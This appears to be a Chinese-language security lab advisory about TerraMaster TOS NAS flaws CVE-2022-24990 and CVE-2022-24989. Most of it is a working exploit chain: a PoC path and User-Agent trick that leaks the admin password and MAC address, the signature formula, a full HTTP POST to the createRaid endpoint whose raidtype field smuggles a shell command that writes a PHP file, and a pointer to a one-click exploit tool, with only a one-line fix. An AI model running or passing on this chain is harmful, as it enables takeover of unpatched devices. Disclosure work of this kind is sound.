古語(yǔ)有云：“學(xué)如逆水行舟，不進(jìn)則退。”面對(duì)如今隨時(shí)都在變化的網(wǎng)絡(luò)安全環(huán)境更是如此。為此，創(chuàng)信華通微信公眾號(hào)特開(kāi)設(shè)“創(chuàng)安實(shí)驗(yàn)室專欄”，以記錄創(chuàng)信華通創(chuàng)安實(shí)驗(yàn)室在技術(shù)上的探索，加強(qiáng)同行間的交流，相互學(xué)習(xí)，共同進(jìn)步。

?+

TerraMaster TOS 存在信息泄漏漏洞，攻擊者通過(guò)漏洞可以獲取服務(wù)器上的敏感信息，配合 CVE-2022-24989漏洞可以獲取服務(wù)器權(quán)限

TerraMaster TOS < 4.2.31

CVE-2022-24990、CVE-2022-24989

嚴(yán)重

目前外界Exp/PoC已公開(kāi)，創(chuàng)安實(shí)驗(yàn)室已驗(yàn)證該漏洞的可利用性：

數(shù)據(jù)包中只需要添加 User-Agent: TNAS, 可以訪問(wèn)到敏感信息

poc: /module/api.php?mobile/webNasIPS

利用信息泄露的 PWD和mac地址，我們就可以利用這個(gè)命令執(zhí)行漏洞了

在發(fā)送請(qǐng)求包寫(xiě)入 php惡意文件

其中md5(mac地址后三字節(jié) + 當(dāng)前時(shí)間戳) = $_SERVER['HTTP_SIGNATURE']

POST /module/api.php?mobile/createRaid HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

Authorization: PWD

Cache-Control: max-age=0

Content-Length: 82

Content-Type: application/x-www-form-urlencoded

Cookie: PHPSESSID=; tos_visit_time=時(shí)間戳

Signature: sign

Timestamp: 時(shí)間戳

Upgrade-Insecure-Requests: 1

User-Agent: TNAS

raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Evuln1.php&diskstring=XXXX

這里利用https://github.com/lishang520/CVE-2022-24990進(jìn)行一鍵獲取和上傳

升級(jí)到安全版本

創(chuàng)安實(shí)驗(yàn)室